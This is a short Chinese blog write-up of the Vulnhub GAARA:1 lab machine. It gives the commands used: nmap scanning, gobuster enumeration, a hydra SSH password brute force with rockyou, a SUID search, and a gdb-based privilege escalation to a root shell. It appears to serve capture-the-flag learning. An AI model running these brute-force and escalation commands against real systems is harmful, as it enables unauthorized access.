Vulnhub:GAARA:1靶机
2021/6/6 18:21:27
本文主要是介绍Vulnhub:GAARA:1靶机,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
1.在浏览器中输入目标靶机IP地址,浏览网页
2.端口扫描
nmap -p- 192.168.31.144 nmap -sC -sV -p 22,80 192.168.31.144
3.目录枚举
扫描到一个Cryoserver目录,接下来在网页中打开
gobuster dir -u http://192.168.31.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
在浏览器中打开这个目录之后,在底部存在三个提示目录,接下来继续探索这三个目录
在/iamGaara目录下发现了一串加密字符串
请教过好大哥得知是base58加密,解密之后得到下面得内容;ssh登录失败,接下来尝试gaara作为用户名暴力破解
4.暴力破解
hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.31.144 ssh
5.ssh成功登录系统,查找拥有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
利用gdb这个文件可以成功获取root权限
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
最后,谢谢大家伙百忙之中观看我的文章。
这篇关于Vulnhub:GAARA:1靶机的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-19《2023版Java工程师》课程升级公告
- 2024-06-15matplotlib作图不显示3D图,怎么办?
- 2024-06-1503-Loki 日志监控
- 2024-06-1504-让LLM理解知识 -Prompt
- 2024-06-05做软件测试需要懂代码吗?
- 2024-06-0514-ShardingSphere的分布式主键实现
- 2024-06-03为什么以及如何要进行架构设计权衡?
- 2024-05-31全网首发第二弹!软考2024年5月《软件设计师》真题+解析+答案!(11-20题)
- 2024-05-31全网首发!软考2024年5月《软件设计师》真题+解析+答案!(21-30题)
- 2024-05-30【Java】百万数据excel导出功能如何实现